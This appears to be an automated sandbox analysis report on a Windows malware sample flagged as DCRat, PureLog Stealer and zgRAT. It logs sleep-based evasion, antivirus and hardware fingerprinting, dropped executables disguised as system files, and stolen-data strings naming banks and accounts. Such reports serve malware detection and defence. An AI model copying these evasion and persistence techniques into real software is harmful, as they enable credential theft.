                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576072s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575915s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575787s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575647s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575523s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575421s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575303s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575185s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575071s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574911s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574781s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574639s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574529s >= -30000sJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 3540Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 1504Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 2156Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 7940Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 5204Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 396Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 3300Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 5700Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 599875Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 599625Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598984Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598047Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597859Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597609Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596828Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596562Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596234Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 595625Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594953Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594741Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594500Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594105Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593844Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593469Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593156Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592812Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592531Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 591922Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 591047Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590734Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 589828Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 589219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 588484Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 588132Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587875Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587453Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587094Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 586859Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 586359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 585594Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 585156Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 584719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 584365Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583937Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583672Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583312Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582844Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582547Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582235Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 581422Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580390Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580094Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 579707Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 579359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 578640Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 578250Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577967Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577582Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577454Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577056Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576912Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576703Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576589Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576312Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576072Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575915Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575787Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575647Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575523Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575421Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575303Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575185Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575071Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574911Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574781Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574639Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574529Jump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2627864937.000000001AFC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                              Source: WAdYZo8ris.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                              Source: WAdYZo8ris.23.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                              Source: WAdYZo8ris.23.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: outlook.office.comVMware20,11696492231s
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: AMC password management pageVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                              Source: w32tm.exe, 00000013.00000002.1353453529.0000027ED0DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                              Source: WAdYZo8ris.23.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                              Source: WAdYZo8ris.23.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CaVMware20
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                              Source: WAdYZo8ris.23.drBinary or memory string: discord.comVMware20,11696492231f
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: global block list test formVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: dev.azure.comVMware20,11696492231j
                              Source: WAdYZo8ris.23.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                              Source: WAdYZo8ris.23.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                              Source: WAdYZo8ris.23.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                              Source: WAdYZo8ris.23.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                              Source: WAdYZo8ris.23.drBinary or memory string: tasks.office.comVMware20,11696492231o
                              Source: WAdYZo8ris.23.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20
                              Source: WAdYZo8ris.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                              Source: WAdYZo8ris.23.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                              Source: WAdYZo8ris.23.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                              Source: WAdYZo8ris.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                              Source: WAdYZo8ris.23.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe" Jump to behavior
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000029CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","760639","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\Desktop","W32YN28 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .1",5,1,"","user","760639","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\Desktop","W32YN28 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeQueries volume information: C:\Windows\DiagTrack\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeQueries volume information: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeQueries volume information: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeQueries volume information: C:\Windows\DiagTrack\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeQueries volume information: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeQueries volume information: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeQueries volume information: C:\Windows\DiagTrack\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeQueries volume information: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeQueries volume information: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeQueries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: jW5TA1J9Z1.exe PID: 3036, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: jW5TA1J9Z1.exe PID: 7840, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7964, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: jW5TA1J9Z1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.jW5TA1J9Z1.exe.630000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\AppReadiness\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: jW5TA1J9Z1.exe, type: SAMPLE
